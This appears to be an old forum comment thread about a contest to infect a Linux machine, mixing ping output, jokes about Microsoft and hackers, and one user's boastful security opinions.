Request timed out.
Request timed out.
Request timed out.
Ping statistics for 24.112.8.23:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
If this were a test for infecting a Windows machine, the contest would already be over and the contest holder would be reinstalling his box right now...
"To make a mistake is only human; to persist in a mistake is idiotic." Cicero
When is the last time you saw a CTO who knew how to use a computer?
:).
I think I've made my point
"...that the hugely successful worm attacks were due to 'tardy' sysadmins."
Uhm, yeah, and 'stupid' MS programmers packaging programs with 'default' options enabled.
When we see that things aren't secure it drives us to improve them.
;)
In this case they aren't criminals, they are participators in a contest.
Imagine where crypto technology would be today if there didn't exist any crackers*.
Imagine what computer security would be today if there didn't exist any hackers*.
Then we might still be using Caesar encryption and run servers on WINDOWS!? boxes
These harmless hackers/crackers drive us to improve security, which stops REAL criminals
*(these words have more than one meaning, in this case I mean 'people who crack codes and ciphers' and 'people who break into computers')
I think I stop here.
spaic - sweden
Not only is this comment completely redundant... so too is the whole contest....
Any user who knows what he's doing can secure a system so that it's completely immune to virii. Close all ports so hackers can't get to you, and don't do anything stupid like opening attachments.
Even in Windows... Close all ports (easier than you might think). Use a program like Eudora, Pegasus, or Kaufman Mail Warrior that don't support scripting. Don't open any attachments. Don't download illicit software. Don't visit WAREZ sites. Don't take burns/diskettes from ANY other computer. Hey wow... you've just eliminated every way a virus can get into your system, and you're completely immune to virii. I could offer a billion dollars in Microshaft stock to the first person to infect me with a virus, and it wouldn't mean squat, because I know what I'm doing.
If you believe everything you read, you'd better not read. - Japanese proverb
i walk over to this guy's linux box with a q-tip.
I then wipe the q-tip on the inside of the box.
I then place the q-tip in a growth culture disk, cover it, and wait for mother nature at her finest to bring the big bucks to me.
so, where my 10k lbs? its polytics i tell ya, polytics...
eat your heart out little billy g.
i'd sure hate to be little billy g.'s dog right now...*grin*
Who said anything about Redhat?
Obviously you don't know what you're talking about. If you are concerned with security, you should be using Slackware, or maybe Debian.
"And we have seen and do testify that the Father sent the Son to be the Savior of the World"
1 John 4:14